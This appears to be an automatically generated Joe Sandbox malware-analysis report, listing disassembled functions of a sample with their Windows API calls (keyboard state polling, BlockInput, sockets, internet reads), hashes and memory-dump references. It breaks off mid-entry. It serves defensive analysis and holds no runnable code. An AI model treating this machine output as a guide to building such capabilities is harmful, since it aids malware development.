                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                              • String ID: *.*
                                                                              • API String ID: 2693929171-438819550
                                                                              • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                              • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                              • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                              • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                              Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __wcsicoll.LIBCMT ref: 0043643C
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                              • __wcsicoll.LIBCMT ref: 00436466
                                                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicollmouse_event
                                                                              • String ID: DOWN
                                                                              • API String ID: 1033544147-711622031
                                                                              • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                              • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                              • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                              • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                              Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              • Opcode ID: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                                              • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                              • Opcode Fuzzy Hash: cabea8b38002fa781011b5f0595ab941099387897a9684b67fae1790c0a48004
                                                                              • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                              Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                              • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                              • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                              • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 3539004672-0
                                                                              • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                              • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                              • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                              • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                              Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • IsWindowVisible.USER32 ref: 00477314
                                                                              • IsWindowEnabled.USER32 ref: 00477324
                                                                              • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                              • IsIconic.USER32 ref: 0047733F
                                                                              • IsZoomed.USER32 ref: 0047734D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                              • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                              • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                              • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                              Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                              • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                              • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                              • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                              • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                              Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ACCEPT$^$h
                                                                              • API String ID: 909875538-4263704089
                                                                              • Opcode ID: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                                              • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                              • Opcode Fuzzy Hash: a6541d7913cd7701a75e3a8dc778404717b64597fc065691f0327c8a2e2ba149
                                                                              • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                              Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                              • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                              • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                              • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                              Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                              • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                              • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                              • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                              • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                              • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                              Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 004433A2
                                                                                • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: rJ
                                                                              • API String ID: 2893107130-1865492326
                                                                              • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                              • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                              • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                              • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                              Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 004433A2
                                                                                • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: rJ
                                                                              • API String ID: 2893107130-1865492326
                                                                              • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                              • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                              • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                              • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                              Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                              • String ID:
                                                                              • API String ID: 901099227-0
                                                                              • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                              • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                              • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                              • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                              Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                              • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                              • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                              • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                              • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                              Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0vH$HH
                                                                              • API String ID: 0-728391547
                                                                              • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                              • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                              • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                              • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                              Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID:
                                                                              • API String ID: 2102423945-0
                                                                              • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                              • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                              • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                              • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                              Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Proc
                                                                              • String ID:
                                                                              • API String ID: 2346855178-0
                                                                              • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                              • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                              • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                              • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                              Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 0045A272
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                              • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                              • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
